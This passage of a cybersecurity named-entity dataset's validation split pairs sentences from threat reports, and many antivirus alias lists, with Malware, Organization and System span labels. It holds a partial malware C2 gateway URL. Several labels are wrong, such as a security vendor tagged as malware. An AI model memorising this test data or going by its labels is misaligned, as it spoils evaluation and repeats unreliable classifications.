Win32/Trojan.4be", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000096", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 Win.Trojan.Sasfis-955 Trojan.Win32.Sasfis.vqujc Trojan.DownLoader13.48334 BehavesLike.Win32.Backdoor.ch Trojan.Win32.Llac Trojan/Llac.gkz BScope.P2P-Worm.Palevo Win32/LockScreen.YL", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000097", "source": "cyner2_valid"}} {"text": "The builder, which creates new versions of the malware, recently leaked on several malware discussion forums.", "spans": {"Malware: versions": [[31, 39]], "Malware: malware,": [[47, 55]]}, "info": {"id": "cyner2_valid_000098", "source": "cyner2_valid"}} {"text": "This report details the activities from a group they named Lazarus, their tools, and the techniques they use to infiltrate computer networks.", "spans": {"Organization: group": [[42, 47]], "Organization: Lazarus,": [[59, 67]], "Malware: tools,": [[74, 80]], "System: computer networks.": [[123, 141]]}, "info": {"id": "cyner2_valid_000099", "source": "cyner2_valid"}} {"text": "Most victims of the Stegoloader Trojan, which has recently been making its rounds in the news, are observed to come from healthcare organizations in North America.", "spans": {"Organization: victims": [[5, 12]], "Malware: Stegoloader Trojan,": [[20, 39]], "Organization: healthcare organizations": [[121, 145]]}, "info": {"id": "cyner2_valid_000100", "source": "cyner2_valid"}} {"text": "Allows an application to force the device to lock Allows applications to access information about Wi-Fi networks .", "spans": {}, "info": {"id": "cyner2_valid_000101", "source": "cyner2_valid"}} {"text": "RuMMS can upload responses to the balance inquiries ( received via SMS message ) to the remote C2 server , which can send back additional commands to be sent from the victim to the provider ’ s payment service .", "spans": {"Malware: RuMMS": [[0, 5]]}, 
"info": {"id": "cyner2_valid_000102", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.HfsAutoA.44AC Virus.Win32.Virut.1!O W32.Virut.G PE_VIRUX.R-3 Win32/Virut.NBP Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg W32.W.Dorifel.moev Virus.Win32.Virut.CE Win32.Virut.56 Virus.Virut.Win32.1939 BehavesLike.Win32.Virut.nc Win32/Virut.bt Virus/Win32.Virut.ce Win32.Virut.ea.368640 Virus.Win32.Virut.ce PWS:Win32/Chyup.C Virus.Virut.14 W32/Sality.AO Trojan-Dropper.Win32.FrauDrop", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000104", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.VB!O Downloader.VB.Win32.17864 Adware.SysMon Trojan/Downloader.VB.ang TROJ_POPPER.D Win32.Trojan.WisdomEyes.16070401.9500.9973 W32/Downloader.RDLP-0632 Trojan.Popper Win32/SillyDl.BBP TROJ_POPPER.D Win.Downloader.18972-1 Trojan-Downloader.Win32.VB.ang Trojan.Win32.VB.uqkj Trojan.DownLoader.14767 Trojan-Downloader.Win32.VB.ang W32/Downloader.AHVD TrojanDownloader.VB.dwh Trojan[Downloader]/Win32.VB Win32.TrojDownloader.VB.kcloud Trojan-Downloader.Win32.VB.ang Trojan/Win32.Xema.C74351 TrojanDownloader.VB Trojan.Downloader.P2P Trojan.DL.VB!SGNR/DYwTaY W32/VB.ANG!tr.dldr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000106", "source": "cyner2_valid"}} {"text": "A new class was added called com.utils.RestClient .", "spans": {}, "info": {"id": "cyner2_valid_000107", "source": "cyner2_valid"}} {"text": "A backdoor also known as: I-Worm.Momma.n3 IRC/Flood.c IRC.Momma.A W32/Worm.AVYM TROJ_SENA1MAKR.A Trojan.IRC.Momma IRC-Worm.Win32.Momma Application.Win32.mIRC.~D TROJ_SENA1MAKR.A IRC/Flood.c Backdoor.Win32.Mard.mirc!IK Worm/Win32.Momma Worm:Win32/Momma.A I-Worm.Win32.Momma.443392 Win32/Momma.443392 W32/Worm.AVYM IRC-Worm.Win32.Momma Trojan.IRCBot Backdoor.Win32.Mard.mirc IRC/Momma.A!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000108", "source": "cyner2_valid"}} {"text": 
"A backdoor also known as: Trojan.Win32.FakeMS.tum Win32.Trojan.FakeIE.b Win.Trojan.Ag-1 Trojan.Win32.Snojan.klq Trojan.DownLoad3.44041 BehavesLike.Win32.Fake.cc Trojan:Win32/Coopop.B Trojan.Heur.kmLfrLgwmBlbh Trojan.Win32.Snojan.klq W32/Snojan.KLQ!tr Win32/Trojan.bf5", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000109", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Symmi.D1291 Trojan.Win32.Fuery.epxyaq Win32.Trojan.Symmi.Gvo BehavesLike.Win32.Vundo.gc W32/Trojan.CNLB-7371 TR/Fuery.spupa Trojan.Win32.Z.Symmi.458752.AU Trojan:Win32/Fuery.E!bit Win32/Trojan.9e9", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000110", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Mdropper VBA/Kryptik.AX TROJ_FRS.0NA103B918 Troj.Downloader.Script!c TROJ_FRS.0NA103B918 TrojanDownloader:O97M/Dornoe.A!ams Macro.Trojan.Dropperx.Auto virus.office.qexvmc.1090", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000112", "source": "cyner2_valid"}} {"text": "Although Talos analyzed the unpacked version of the code , the packer analysis is beyond the scope of this post .", "spans": {"Malware: Talos": [[9, 14]]}, "info": {"id": "cyner2_valid_000113", "source": "cyner2_valid"}} {"text": "Earlier this year, the second largest health insurance provider in the US publicly disclosed that it had been the victim of a major cyberattack.", "spans": {"Organization: health insurance provider": [[38, 63]]}, "info": {"id": "cyner2_valid_000114", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.Clode6c.Trojan.3552 TrojanAPT.ScarCruft.DB5 Trojan.ScarCruft Trojan.Scarcruft TROJ_SCRUFT.A Troj.W32.Scarcruft!c TROJ_SCRUFT.A Trojan.ScarCruft.a Trojan[:HEUR]/Win32.ScarCruft Backdoor:Win32/ScarCruft.A!dha Trojan.ScarCruft! 
Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000115", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Worm/W32.Newpic.32768.B Worm.Newpic Worm.Choke.Win32.6 W32.W.Newpic.d!c WORM_NEWPIC.D W32.Choke.Worm Win32/Annoying.32768.B WORM_NEWPIC.D Email-Worm.Win32.Newpic.d Trojan.Win32.Newpic.fwiy I-Worm.Win32.Newpic.D Win32.HLLM.Choke.32678 Backdoor.VB W32/Risk.UNPB-0819 I-Worm/Newpic.d WORM/NewPic.D Worm[Email]/Win32.Newpic Trojan.Heur.VB.EAA4AA Email-Worm.Win32.Newpic.d Worm:Win32/Jermsg.C Win32/Newpic.worm.32768.B Worm.Newpic W32/Choke.B.worm Win32/Choke.E Win32.Worm-email.Newpic.Pcil I-Worm.Newpic.D W32/Choke.D!worm Win32/Worm.ff1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000116", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/W32.Gimemo.658944.C Trojan-Ransom.Win32.Gimemo!O Trojan.Gimemo.Win32.6352 Trojan.Graftor.D1C40B W32.Dompie Trojan-Ransom.Win32.Gimemo.bcdt Trojan.Win32.Gimemo.cqlzku Trojan.AVKill.30965 Trojan.Gimemo.us W32.Gimemo.Bcdt Trojan[Ransom]/Win32.Gimemo Ransom:Win32/Somhoveran.A Trojan-Ransom.Win32.Gimemo.bcdt Trojan/Win32.Gimemo.R89518 TScope.Trojan.Delf Trojan.Gimemo!HSGdw3uyR7g Trojan.Win32.Somhoveran", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000117", "source": "cyner2_valid"}} {"text": "They do this not only to identify whether the use of a particular app may permit them to harvest another credential , but also because each targeted app needs to have an overlay mapped to its design , so the Trojan can intercept and steal user data .", "spans": {}, "info": {"id": "cyner2_valid_000118", "source": "cyner2_valid"}} {"text": "Since then, researchers saw an increasing number of instances in the wild and have traced the attack campaign's source.", "spans": {}, "info": {"id": "cyner2_valid_000122", "source": "cyner2_valid"}} {"text": "In October 2012, malware attacks against Israeli government targets grabbed media 
attention as officials temporarily cut off Internet access for its entire police force and banned the use of USB memory sticks.", "spans": {"Organization: Israeli government": [[41, 59]], "Organization: media": [[76, 81]]}, "info": {"id": "cyner2_valid_000123", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Win32.Ircbot.SAZA Trojan.OneX.2 BehavesLike.Win32.Trojan.ch Trojan:Win32/Imsproad.A BScope.Trojan-Dropper.1291 Backdoor.Bot Win32.Trojan.Spy.Lkmy Worm.Slenfbot!aV8aXWGMSmc Trojan.Win32.Imsproad W32/Slenfbot.AJ!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000124", "source": "cyner2_valid"}} {"text": "Super Mario Run Malware # 2 – DroidJack RAT Gamers love Mario and Pokemon , but so do malware authors .", "spans": {"Malware: Super Mario Run Malware": [[0, 23]], "Malware: DroidJack RAT": [[30, 43]], "System: Mario": [[56, 61]], "System: Pokemon": [[66, 73]]}, "info": {"id": "cyner2_valid_000127", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.OnGamesLT180912HKGHAAI.Trojan Trojan-GameThief.Win32.OnLineGames!O Win32.Trojan.WisdomEyes.16070401.9500.9983 Troj.PSW32.W.OnLineGames.lcpY Trojan.Click3.15544 BehavesLike.Win32.PWSOnlineGames.cc Trojan.Zlob Trojan/PSW.GamePass.pmn Trojan/Win32.Unknown Win32.Troj.Undef.kcloud TrojanDownloader:Win32/Winical.A BScope.Trojan.QQhelper Trj/Pupack.A Win32/Trojan.3c4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000128", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9968 Trojan.Win32.AVKill.ewqzay Trojan.AVKill.60640 BehavesLike.Win32.MultiPlug.dc Trojan.Ursu.DBD1B Ransom:Win32/Tescrypt.T Trojan.Crypt Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000129", "source": "cyner2_valid"}} {"text": "In doing so, we discovered that it's been a very profitable year for SamSa, with an estimated $450,000 in 
ransom payments from samples we have identified.", "spans": {}, "info": {"id": "cyner2_valid_000131", "source": "cyner2_valid"}} {"text": "Th 64KB buffer is used as a VM descriptor data structure to store data and the just-in-time ( JIT ) generated code to run .", "spans": {}, "info": {"id": "cyner2_valid_000132", "source": "cyner2_valid"}} {"text": "This is on top of its normal ransomware routines, giving the attackers two ways to profit off of one infection.", "spans": {"Malware: ransomware": [[29, 39]], "Malware: infection.": [[101, 111]]}, "info": {"id": "cyner2_valid_000134", "source": "cyner2_valid"}} {"text": "Stage 2 : Exodus Two The Zip archive returned by the check-in performed by Exodus One is a collection of files including the primary payload mike.jar and several compiled utilities that serve different functions .", "spans": {"Malware: Exodus Two": [[10, 20]], "Malware: Exodus One": [[75, 85]]}, "info": {"id": "cyner2_valid_000135", "source": "cyner2_valid"}} {"text": "Most malware found on Google Play contains only a dropper that later downloads the real malicious components to the device .", "spans": {"System: Google Play": [[22, 33]]}, "info": {"id": "cyner2_valid_000136", "source": "cyner2_valid"}} {"text": "Next , the loader checks that it ’ s not running in a virtualized environment ( VMWare or Hyper-V ) or under a debugger .", "spans": {"System: VMWare": [[80, 86]], "System: Hyper-V": [[90, 97]]}, "info": {"id": "cyner2_valid_000137", "source": "cyner2_valid"}} {"text": "The infection routine for BARTALEX uses a Microsoft Word document and social engineering lure that is widely recognized by enterprises—making infection all too possible.", "spans": {"Malware: BARTALEX": [[26, 34]], "System: Microsoft Word": [[42, 56]]}, "info": {"id": "cyner2_valid_000138", "source": "cyner2_valid"}} {"text": "However, while the malware used in these new attacks uses similar infection mechanisms to PlugX, it is a completely new tool with its own specific 
behavior patterns and architecture.", "spans": {"Malware: malware": [[19, 26]], "Malware: attacks": [[45, 52]], "Malware: PlugX,": [[90, 96]], "Malware: tool": [[120, 124]]}, "info": {"id": "cyner2_valid_000139", "source": "cyner2_valid"}} {"text": "Once the keyword is present , the SDK will switch from innocent ads server to malicious payload delivery ones .", "spans": {}, "info": {"id": "cyner2_valid_000140", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Pitit.A3 Trojan.Barys.DC7C4 TROJ_APPROM.SM TROJ_APPROM.SM Trojan.Win32.Clicker.ctxopv W32.Email.Worm.Silly TR/Kazy.65836 Trojan:MSIL/Pitit.A Trojan.FakeMS.ED Win32/Trojan.118", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000141", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.WasaladCS.S1416205 Trojan.Zbot.Win32.204389 Trojan.Zbot.241 Win32.Trojan.WisdomEyes.16070401.9500.9853 W32/Trojan2.PXIY Trojan-Spy.Win32.Zbot.yidv Trojan.PWS.Panda.5255 Trojan.Crypt W32/Trojan.YBOL-4127 TrojanSpy.Zbot.fkmq TR/Crypt.Xpack.dvziu Trojan-Spy.Win32.Zbot.yidv TrojanSpy.Zbot Trojan.Crypt Win32/Spy.Zbot.YW TrojanSpy.Zbot!3x6SCEc6VcA", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000142", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.VB!O Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Trojan.YDPN-6125 Trojan.Win32.VB.dmom Win32.Trojan.Patched.Lors BehavesLike.Win32.VBObfus.gh Trojan:Win32/Cotfuser.A Trojan.Win32.VB.dmom BScope.Trojan.Diple Trojan.Vundo W32/VB.QDB!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000143", "source": "cyner2_valid"}} {"text": "An example of some actions these modules perform is spreading by posting click-bait messages on Facebook and VKontakte Russian social network.", "spans": {"System: Facebook": [[96, 104]], "System: VKontakte Russian social network.": [[109, 142]]}, "info": {"id": "cyner2_valid_000144", "source": "cyner2_valid"}} {"text": "In 
the 2015-early 2016 versions examined in this article , C & C instructions in JSON format contained the name of the command in text form ( “ get_sms ” , “ block_phone ” ) .", "spans": {}, "info": {"id": "cyner2_valid_000145", "source": "cyner2_valid"}} {"text": "In each case, the threat actor was injecting malicious code into customer-facing web pages and collecting information about visitors' environments, and redirecting them to malicious sites.", "spans": {"Malware: malicious code": [[45, 59]], "System: visitors' environments,": [[124, 147]]}, "info": {"id": "cyner2_valid_000147", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W97m.Downloader.FAN W97M.Downloader.WF W97M.Downloader TROJ_FRS.0NA003BN17 Doc.Dropper.MagicHound-5859115-0 W97m.Downloader.FAN Trojan.Ole2.Vbs-heuristic.druvzi W97m.Downloader.FAN W97m.Downloader.FAN W97M.DownLoader.1378 TROJ_FRS.0NA003BN17 TrojanDownloader:O97M/Powmet.A HEUR.VBA.Trojan.d W97m.Downloader.FAN W97m.Downloader.FAN heur.macro.powershell.b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000149", "source": "cyner2_valid"}} {"text": "A backdoor also known as: TrojanDownloader.Bemidal W32/Trojan.LCLF-2053 Trojan.Win32.Banload.dukboc Trojan.Win32.Z.Banload.442880.A Troj.Downloader.W32.CodecPack.lz0R BehavesLike.Win32.PUPXAC.gc TR/Dldr.Banload.nclqj Trojan[Downloader]/Win32.Banload Trojan.Symmi.D8A7 Trj/GdSda.A Win32.Trojan.Symmi.Wsae Trojan-Downloader.Win32.Banload W32/Banload.VXF!tr.dldr Win32/Trojan.a4f", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000150", "source": "cyner2_valid"}} {"text": "myjino .ru/ htdocs/gateway/gate.php?uuid=Personal ID of your computer, for example: 4df7065b1d049d098526344faaabf3f8", "spans": {}, "info": {"id": "cyner2_valid_000151", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32/Trojan.SKWY-4323 Win.Trojan.4173078-1 Worm.BAT.Autorun.gg Trojan.Win32.Autorun.uxdwl Worm.BAT.Autorun.gg!c Trojan.MulDrop2.32245 
Worm.AutoRun.Win32.32285 BehavesLike.Win32.Virus.pt W32/Trojan2.NFKY Worm.BAT.bx WORM/Moopidoop.A.6 Worm.Autorun.kcloud Worm.BAT.Autorun.gg Worm:Win32/Moopidoop.A Dropper/Win32.Xema.C65666 Worm.BAT.Autorun Bat.Worm.Autorun.Pfad Worm.BAT.Autorun BAT/Autorun.GG!worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000152", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Ransomware.DMALocker.A5 Ransom_MADLOCKER.SMLV Win32.Trojan-Ransom.DMALocker.B Trojan.Win32.Z.Dmalocker.221184.CG TrojWare.Win32.Ransom.DMALocker.C Trojan:W32/DMALocker.A Trojan.Encoder.4199 Trojan/Filecoder.DMALocker.c Trojan.Ransom.Dmalocker.A TR/Ransom.tvnwt Win32.Trojan.Cryptor.Heur Ransom.DMALocker Trojan.Filecoder!Hm27KMcAqqg Trojan-Ransom.FileCoder W32/Kryptik.35100!tr Win32/Trojan.Ransom.f7b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000153", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Dacic.FC.1014 Win32.Trojan.WisdomEyes.16070401.9500.9978 Win.Trojan.8151962-1 Backdoor.Msil.Spygate!c Win32.Trojan.Spy.Tbik Trojan.DownLoader7.18225 W32/Trojan.YFXC-2645 TrojanSpy.MSIL.chc Trojan[Spy]/MSIL.KeyLogger Trojan.MSIL.Krypt.4 Backdoor:Win32/Shadow.H TrojanSpy.MSIL.KeyLogger Trojan.MSIL.Spy MSIL/Autorun.VOST!tr Win32/Backdoor.Spy.f85", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000154", "source": "cyner2_valid"}} {"text": "Make sure that all other apps installed and the device operating systems are updated to the latest version .", "spans": {}, "info": {"id": "cyner2_valid_000155", "source": "cyner2_valid"}} {"text": "Trend Micro ’ s Mobile App Reputation Service ( MARS ) covers Android and iOS threats using leading sandbox and machine learning technologies , protecting devices against malware , zero-day and known exploits , privacy leaks , and application vulnerabilities .", "spans": {"Organization: Trend Micro": [[0, 11]], "System: Mobile App Reputation Service": [[16, 45]], 
"System: Android": [[62, 69]], "System: iOS": [[74, 77]]}, "info": {"id": "cyner2_valid_000156", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9879 Trojan.Win32.Miner.tajv Trojan.Win32.Miner.euuymf BehavesLike.Win32.Trojan.wc TR/BAS.FakeAlert.31018885 Trojan.Win32.Miner.tajv Trojan:Win32/Grudapa.A!bit Trj/CI.A Win32.Trojan.Miner.Pcsx", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000157", "source": "cyner2_valid"}} {"text": "List of anti-virus packages that are checked The payload goes a long way to protect itself and checks for anti-virus software installed on the mobile device .", "spans": {}, "info": {"id": "cyner2_valid_000158", "source": "cyner2_valid"}} {"text": "A brief update on infrastructure associated with the IcedID dropper malware, as well as a brief window of time, has been published by the S2 Research Team, based on pDNS and certificate data.", "spans": {"Malware: IcedID dropper malware,": [[53, 76]], "Organization: the S2 Research Team,": [[134, 155]]}, "info": {"id": "cyner2_valid_000160", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Crypt.CG Trojan-Dropper/W32.Microjoin.14850 Troj.Dropper.W32.Microjoin.af!c Trojan/Dropper.Microjoin.af Trojan.DR.Microjoin!u0/JcLBzSFg Trojan.Dropper Win32/PSW.LdPinch TROJ_LDPINCH.EC Worm.Bagle-120 Trojan-Dropper.Win32.Microjoin.af Trojan.Crypt.CG Trojan.Win32.Microjoin.hjzu Trojan.Crypt.CG TrojWare.Win32.PSW.LdPinch Trojan.Crypt.CG Dropper.Microjoin.Win32.280 TROJ_LDPINCH.EC BehavesLike.Win32.Downloader.lh TrojanDropper.Microjoin.ko TR/Drop.Microj.AF.2 W32/Dropper.MLTR!tr Trojan[Dropper]/Win32.Microjoin Trojan.Crypt.CG Dropper/Microjoin.37500 Virus.Win32.Heur.c MalwareScope.Trojan-PSW.Pinch.1 W32/Bagle.N Trojan-Dropper.Win32.Microjoin Trojan.Crypt.CG Dropper.Tiny.U", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000162", "source": "cyner2_valid"}} {"text": "This change came hand in 
hand with a new overlay target list , no longer targeting social apps , but focusing on banking instead .", "spans": {}, "info": {"id": "cyner2_valid_000163", "source": "cyner2_valid"}} {"text": "Libya maybe known in non-stable political system, civil war and militant groups fighting for the land and oil control but it is definitely not known in cyber malicious activities, cyber espionage and hacking groups.", "spans": {"Organization: militant groups": [[64, 79]]}, "info": {"id": "cyner2_valid_000164", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.DownloadGovdi.Trojan TrojanDownloader.Govdi Trojan/Crapmisc.d Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_GOGLOAD.A Trojan.Click2.56232 TROJ_GOGLOAD.A W32/Trojan.FUNZ-7719 DangerousObject.Multi.fel TR/Spy.11264.242 Trojan.Heur.RP.EAB002 TrojanDownloader:Win32/Govdi.A Trojan/Win32.Downbot.R164559 Win32.Trojan.Gogload.Ssgo Trojan.Win32.Spy", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000165", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Adware.ICLoader.A3 Win32.Trojan.Kryptik.nz Trojan.Win32.AdLoad.dxenuj Application.Win32.ICLoader.NW Adware.SmartInstallerCRTD.Win32.6482 PUA.Win32.Dlhelper AdWare.ICLoader.v PUA/ICLoader.pos GrayWare[AdWare]/Win32.ICLoader.iue Trojan.Application.Bundler.ICLoader.19 Adware/Win32.ICLoader.R165698 AdWare.ICLoader Adware.ICLoader PUA.SmartInstaller! 
W32/Kryptik.DXUS!tr Win32/Virus.dc6", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000166", "source": "cyner2_valid"}} {"text": "In such situations , mobile users should always take the utmost precautions while downloading any applications from the internet .", "spans": {}, "info": {"id": "cyner2_valid_000167", "source": "cyner2_valid"}} {"text": "This article is a result of an initial investigation, no attribution is done but you'll have all the necessary info for a deeper investigation.", "spans": {}, "info": {"id": "cyner2_valid_000168", "source": "cyner2_valid"}} {"text": "The malware developer uses various tactics to do so , and one of them is using Android 's broadcast receivers .", "spans": {"System: Android": [[79, 86]]}, "info": {"id": "cyner2_valid_000170", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32/Downeks.G Trojan.DownLoader24.20994 Trojan.Win32.Downeks W32/Trojan.HWYN-3481 TrojanDropper.Autoit.bpu TR/Downeks.nsanv Trj/CI.A Win32/Trojan.Downloader.132", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000171", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Cometer Win.Trojan.MSShellcode-6360728-0 Troj.W32.Cometer!c Trojan.Cometer.Win32.323 Trojan.Cometer.dt Trojan/Win32.Cometer Trojan:Win32/Metasploit.X", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000172", "source": "cyner2_valid"}} {"text": "The malware has been in the wild for over 10 months, but out of 57 security vendors in VirusTotal, only one is detecting the malware at the time of this writing.", "spans": {"Malware: malware": [[4, 11], [125, 132]], "Organization: 57 security vendors": [[64, 83]], "Organization: VirusTotal,": [[87, 98]]}, "info": {"id": "cyner2_valid_000173", "source": "cyner2_valid"}} {"text": "We're also seeing Astrum redirected by the Seamless malvertising campaign, which is known for using the Rig exploit kit.", "spans": {"Malware: the Rig exploit 
kit.": [[100, 120]]}, "info": {"id": "cyner2_valid_000174", "source": "cyner2_valid"}} {"text": "Iranian Threat Agent Greenbug has been registering domains similar to those of Israeli High-Tech and Cyber Security Companies.", "spans": {"Malware: Greenbug": [[21, 29]], "Organization: Israeli High-Tech": [[79, 96]], "Organization: Cyber Security Companies.": [[101, 126]]}, "info": {"id": "cyner2_valid_000175", "source": "cyner2_valid"}} {"text": "FireEye has detected a new attack by the Angler Exploit Kit EK that exploits CVE-2015-3090 in Adobe Flash Player.", "spans": {"Organization: FireEye": [[0, 7]], "Malware: Angler Exploit Kit EK": [[41, 62]], "Vulnerability: exploits CVE-2015-3090": [[68, 90]], "System: Adobe Flash Player.": [[94, 113]]}, "info": {"id": "cyner2_valid_000176", "source": "cyner2_valid"}} {"text": "What this means for you All Lookout customers are protected from this threat .", "spans": {"Organization: Lookout": [[28, 35]]}, "info": {"id": "cyner2_valid_000177", "source": "cyner2_valid"}} {"text": "Malware code showing decryption of assets Figure 10 .", "spans": {}, "info": {"id": "cyner2_valid_000178", "source": "cyner2_valid"}} {"text": "PluginPhantom also gains the ability to evade the static detection by hiding malicious behaviors in plugins.", "spans": {"Malware: PluginPhantom": [[0, 13]], "Malware: malicious behaviors": [[77, 96]], "System: plugins.": [[100, 108]]}, "info": {"id": "cyner2_valid_000179", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.HfsAutoB.6419 Worm.NSIS.Voterai.H Win32.Trojan.WisdomEyes.16070401.9500.9712 W32/Trojan-Gypikon-based.DM2!Ma W32.Voterai Win.Trojan.Agnido-1 Trojan.NSIS.Voter.a Trojan.Nsis.Voter.cxlgfm BehavesLike.Win32.BadFile.fz W32/Trojan-Gypikon-based.DM2!Ma Worm:Win32/Voterai.H Trojan.Heur.ED15C23 Worm/Win32.Voterai.R75943", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000180", "source": "cyner2_valid"}} {"text": "Figure 13 : placeholder classes in Boot module 
Technical Analysis – Patch Module When “ Agent Smith ” has reached its goal – a malicious payload running inside the original application , with hooks on various methods – at this point , everything lies with maintaining the required code in case of an update for the original application .", "spans": {"Malware: Agent Smith": [[88, 99]]}, "info": {"id": "cyner2_valid_000181", "source": "cyner2_valid"}} {"text": "One prevalent campaign in the wild with this remote access trojan is the use of a Microsoft OneNote spear phishing attachment to load a .HTA file that downloads and runs an obfuscated batch script to execute the actual AsyncRAT code.", "spans": {"Malware: remote access trojan": [[45, 65]], "System: Microsoft OneNote": [[82, 99]], "Malware: AsyncRAT code.": [[219, 233]]}, "info": {"id": "cyner2_valid_000182", "source": "cyner2_valid"}} {"text": "Intercept Call - Triggers on incoming and outgoing calls .", "spans": {}, "info": {"id": "cyner2_valid_000183", "source": "cyner2_valid"}} {"text": "Before she disappeared from Facebook, Mia Ash was a fun-loving, young photographer who used the world s biggest social network to showcase her work.", "spans": {"Organization: Facebook, Mia Ash": [[28, 45]], "Organization: social network": [[112, 126]]}, "info": {"id": "cyner2_valid_000184", "source": "cyner2_valid"}} {"text": "] com through an upload queue .", "spans": {}, "info": {"id": "cyner2_valid_000185", "source": "cyner2_valid"}} {"text": "A backdoor also known as: VB:Trojan.VBA.Dropper.D W97M.Downloader.BPN W97M/Downloader.chr W97M.Downloader VB:Trojan.VBA.Dropper.D VB:Trojan.VBA.Dropper.D Trojan.Ole2.Vbs-heuristic.druvzi VB:Trojan.VBA.Dropper.D W97M/Downloader.chr Trojan.HRLT-5 Trojan:O97M/Syscon.A HEUR.VBA.Trojan.d VB:Trojan.VBA.Dropper.D Win32/Trojan.90c", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000186", "source": "cyner2_valid"}} {"text": "Shell Crew, first named by RSA, has been incredibly proficient over time and breached 
numerous high-value targets.", "spans": {"Organization: RSA,": [[27, 31]]}, "info": {"id": "cyner2_valid_000187", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.Inject!O Win32/RiskWare.PEMalform.E Win.Trojan.Blackshades-2 Tool.PassView.352 Troj.W32.VB.kYUh PWS:Win32/Bissldr.A Trojan.VB.Crypt W32/VBNA.BH!worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000189", "source": "cyner2_valid"}} {"text": "A backdoor also known as: HackTool.Nbsi.B HackTool.Win32.VB!IK W32/Hacktool.EXH Win32.NBSI HackTool.Win32.NBSI TrojWare.Win32.HackTool.NBSI SPR/NBSI.A.1 TROJ_DREAMCAT.B HackTool.Win32.NBSI Trojan.Win32.Nbsi.a HackTool.Win32.VB", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000192", "source": "cyner2_valid"}} {"text": "LINE, an application that offers free calls and chat messages is commonly used in countries such as Taiwan, Japan, Indonesia, India, United States, Mexico, and Colombia among others.", "spans": {"Organization: LINE,": [[0, 5]]}, "info": {"id": "cyner2_valid_000193", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.Clod0b5.Trojan.5aa7 Trojan/Asterope.a Win.Trojan.Asterope-1 Trojan.Win32.Z.Asterope.143872[h] Trojan.Asterope.Win32.5 BehavesLike.Win64.Dropper.ch W64/Asterope.A!tr Trojan:Win64/Ropest.G Trojan.Win64.Asterope.C Win32.Trojan.Atraps.Dygx Trojan.Win64.Asterope Dhupad.GEF Trj/CI.A Win32/Trojan.0fe", "spans": {"Malware: 